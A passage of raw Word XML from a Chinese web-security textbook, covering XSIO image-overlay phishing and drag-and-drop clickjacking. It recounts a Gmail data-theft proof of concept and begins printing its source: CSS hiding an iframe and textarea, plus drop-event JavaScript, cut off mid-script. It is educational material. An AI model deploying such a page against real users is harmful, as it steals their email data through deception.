        <w:t>修改页面中的联系电话，可能会导致很多用户上当。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>标签在很多系统中是对用户开放的，因此在现实中有非常多的站点存在被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>攻击的可能。在防御 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSIO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>时，需要检查用户提交的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>标签的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>style </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>属性是否可能导致浮出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>拖拽劫持与数据窃取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="302"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>技术有了新的发展。一位名叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paul Stone </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的安全研究者在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>BlackHat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>大会上发表了题为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Next Generation Clickjacking</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”的演讲。在该演讲中，提出了“浏览器拖拽事件”导致的一些安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>目前很多浏览器都开始支持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Drag &amp; Drop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>。对于用户来说，拖拽使他们的操作更加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>简单。浏览器中的拖拽对象可以是一个链接，也可以是一段文字，还可以从一个窗口拖拽到另外一个窗口，因此拖拽是不受同源策略限制的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="202" w:right="185" w:firstLine="299"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>“拖拽劫持”的思路是诱使用户从隐藏的不可见 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中“拖拽”出攻击者希望得到的数据，然后放到攻击者能控制的另外一个页面中，从而窃取数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>或者 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Java API </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的支持下，这个攻击过程会变得非常隐蔽。因为它突破了传统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto" w:before="73"/>
        <w:ind w:left="603" w:right="967" w:hanging="401"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="268366199">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1504269</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>945638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2427195" cy="1173479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25" name="image21.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="26" name="image21.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2427195" cy="1173479"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>一些先天的局限，所以这种新型的“拖拽劫持”能够造成更大的破坏。国内的安全研究者 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>xisigr </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>曾经构造了一个针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Gmail</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>，其过程大致如下。首先，制作一个网页小游戏，要把小球拖拽到小海豹的头顶上。</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15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="19" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>演示拖拽劫持的网页小游戏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3592;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,10.936894pt" to="158.16pt,10.936894pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark7" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>2 </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://hi.baidu.com/xisigr/blog/item/2c2b7a110ec848f0c2ce79ec.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>实际上，在小球和小海豹的头顶上都有隐藏的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>xisigr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>event.dataTransfer.getData('Text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>') </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来获取“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>drag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”到的数据。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>用户拖拽小球时，实际上是选中了隐藏的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>里的数据；在放下小球时，把数据也放在了隐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
        </w:rPr>
        <w:t>藏的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>textarea </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中，从而完成一次数据窃取的过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3640">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>452627</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>110716</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4628958" cy="2459640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="27" name="image22.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="28" name="image22.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4628958" cy="2459640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="169"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原理示意图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这个例子的源代码如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="165"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.830128pt;width:411.15pt;height:270pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-69208" coordorigin="254,157" coordsize="8223,5400" path="m8477,958l254,958,254,1157,254,1357,254,1558,254,1757,254,1957,254,2158,254,2357,254,2557,254,2758,254,2957,254,3157,254,3358,254,3557,254,3757,254,3958,254,4157,254,4357,254,4558,254,4757,254,4957,254,5158,254,5357,254,5557,8477,5557,8477,5357,8477,5158,8477,4957,8477,4757,8477,4558,8477,4357,8477,4157,8477,3958,8477,3757,8477,3557,8477,3358,8477,3157,8477,2957,8477,2758,8477,2557,8477,2357,8477,2158,8477,1957,8477,1757,8477,1558,8477,1357,8477,1157,8477,958m8477,358l254,358,254,557,254,757,254,958,8477,958,8477,757,8477,557,8477,358m8477,157l254,157,254,358,8477,358,8477,157e" filled="true" fillcolor="#dadada" stroked="false">
            <v:path arrowok="t"/>
            <v:fill type="solid"/>
            <w10:wrap type="none"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="361" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Gmail Clickjacking with drag and drop Attack Demo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
        <w:ind w:left="680" w:right="122" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>.iframe_hidden{height: 50px; width: 50px; top:360px; left:365px; overflow:hidden; filter: alpha(opacity=0); opacity:.0; position: absolute; } .text_area_hidden{ height: 30px; width: 30px; top:160px; left:670px; overflow:hidden; filter: alpha(opacity=0); opacity:.0; position: absolute; } .ball{ top:350px; left:350px; position: absolute; } .ball_1{ top:136px; left:640px; filter: alpha(opacity=0); opacity:.0; position: absolute; }.Dolphin{ top:150px; left:600px; position: absolute; }.center{ margin-right: auto;margin-left: auto;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="4"/>
        <w:ind w:left="680" w:right="4546" w:hanging="478"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>vertical-align:middle;text-align:center; margin-top:350px;}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="519" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="680" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function Init() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="20"/>
        <w:ind w:left="841" w:right="3233" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var source = document.getElementById("source"); var target = document.getElementById("target"); if (source.addEventListener) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="999" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>target.addEventListener("drop", DumpInfo, false);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="999" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>target.attachEvent("ondrop", DumpInfo);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="841" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
